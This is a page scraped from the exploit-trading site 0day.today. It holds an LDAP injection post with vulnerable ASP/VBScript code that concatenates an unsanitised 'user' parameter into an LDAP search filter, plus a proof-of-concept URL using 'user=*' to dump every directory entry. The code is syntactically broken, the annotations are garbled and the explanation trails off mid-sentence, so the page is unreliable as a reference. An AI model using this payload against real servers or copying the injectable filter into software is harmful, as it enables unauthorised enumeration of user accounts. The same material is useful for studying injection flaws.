0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LDAP Injection Vulnerability
[============================
LDAP Injection Vulnerability
============================
[+] Vurnerebility: LDAP Injection
[+] Category : Implemented Web exploit
[+] Category : Attack Technique
[+] Author : mc2_s3lector
[+] dork : X/o\"
[+] Contact : www.yogyacarderlink.web.id
[+] date : 4-2-10
[+] biGthank to : Allah
---------------------------------------------------------------------------------------------------------------------------------------------------
Directory acces protokol/directory manipulation,protokol breaker->standar protocol,query
custom statement,page request,componen execute command,data base server,web apps services
modify,remove etc.
---------------------------------------------------------------------------------------------------------------------------------------------------
code:
<html>
<head>
<body>
<%@ Language=VBScript %>
<%
Dim userName
Dim filter
Dim ldapObj
Const LDAP_SERVER = "ldap.example"
userName = Request.QueryString("user")<-----------*1(LOOK THIS BUG LINE PARAMETER USER=EMPTY)
( userName = "" ) then
Response.Write("<b>Invalid
request. Please specify a
valid user name</b><br>")
Response.End()
end if
filter= "(uid=" + CStr(userName) + //((*1))
userName used to initialize filter variable on this line direct query LDAP call to finf filter on ((*.3))
")" ' searching
for the user entry
'Creat LDAP object and setting
the base dn
Set ldapObj =
Server.CreateObject("IPWorksASP.LDAP")
ldapObj.ServerName = LDAP_SERVER
ldapObj.DN =
"ou=people,dc=spilab,dc=com"
'Setting the search filter
ldapObj.SearchFilter = ((*.3))filter<---call SearchFilter on this line
ldapObj.Search
'Showing the user ennumeratin info
While ldapObj.result = ((1*.4 to *.5))
Response.Write("<p>")
Write("<b><u>User
information for : " +
ldapObj.AttrValue(0) + "</u></b><br>")
For i = 0 To ldapObj.AttrCount -1
Response.Write("<b>" +
ldapObj.AttrType(i) +
"</b> : " + ldapObj.AttrValue(i) + "<br>" )
Response.Write("</p>")
Wend ((*.5))
%>
</head>
</body>
</html>
---------------------------------------------------------------------------------------------------------------------------------------------------
control over LDAP to querry =server LDAP & get query result from ((*.4 to *.5))
POC:
http://server/ldapsearch.asp?user=* <----send the * character in the parameter user,result flter variable in code to be initialized with
(uid=*). The resulting LDAP statement will make the server return
-------------------------------------------------------------------------------------------------------------------------------------------------
# 0day.today [2024-10-05] #